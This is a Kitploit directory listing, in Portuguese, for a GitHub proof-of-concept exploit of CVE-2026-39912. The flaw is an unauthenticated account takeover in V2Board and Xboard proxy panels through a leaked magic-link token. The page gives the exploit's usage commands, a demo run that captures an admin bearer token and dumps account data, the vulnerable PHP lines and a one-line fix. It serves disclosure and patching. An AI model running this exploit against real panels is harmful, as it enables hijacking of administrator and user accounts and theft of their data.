Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39912 — Xboard / V2Board - Assunção de Conta Não Autenticada - Vazamento de Token de Link Mágico (CVE-2026-39912) | Kitploit
Ferramentas/GitHubGitHub/chocapikk/cve-2026-39912
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAutenticação
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board - Assunção de Conta Não Autenticada - Vazamento de Token de Link Mágico (CVE-2026-39912)

Ver Repositório
26há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Site
Compartilhar

CVE-2026-39912 - Xboard / V2Board: Assunção de Conta Não Autenticada

Vazamento do Token de Magic Link em loginWithMailLink

CVECVE-2026-39912
CVSS9.1 (Crítico)
CWECWE-201 (Inserção de Informações Sensíveis em Dados Enviados)
AfetadosV2Board >= 1.6.1 até 1.7.4 / Xboard todas as versões até 0.1.9+
CorrigidoAinda não (V2Board abandonado desde junho de 2023)
Divulgado2026-04-09
CréditoValentin Lobstein (Chocapikk)
Análisechocapikk.com
PRs de correçãoV2Board #981 / Xboard #873

TL;DR

O endpoint loginWithMailLink retorna o link de login mágico diretamente no corpo da resposta HTTP em vez de apenas enviá-lo por e-mail. Um atacante não autenticado que conheça um e-mail registrado pode assumir qualquer conta - incluindo a de administrador - em duas requisições HTTP.

Software Afetado

  • V2Board - Painel de gerenciamento de protocolo proxy de código aberto (8,7 mil estrelas, abandonado)
  • Xboard - Fork do V2Board (mais de 4 mil estrelas, mantido ativamente)

Ambos são painéis VPN/proxy amplamente implantados, principalmente na China. O ZoomEye mostra mais de 7.000 instâncias expostas na internet.

Requisitos

  • login_with_mail_link_enable deve estar habilitado nas configurações de administrador (não habilitado por padrão)
  • Um endereço de e-mail registrado válido

Uso

# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 [email protected]

# Save dump to file
python3 exploit.py http://target:7001 [email protected] -o dump.json

Demonstração

$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

O Bug

V2Board (app/Http/Controllers/Passport/AuthController.php):

SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token leaked to caller
]);

Xboard (app/Services/Auth/MailLinkService.php):

$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork

A Correção

- return [true, $link];
+ return [true, true];

Referências

  • V2Board - Código vulnerável (linha 71)
  • Xboard - Código vulnerável (linha 49)
  • Commit original que introduziu o bug (2022-06-27)
Baixar ferramenta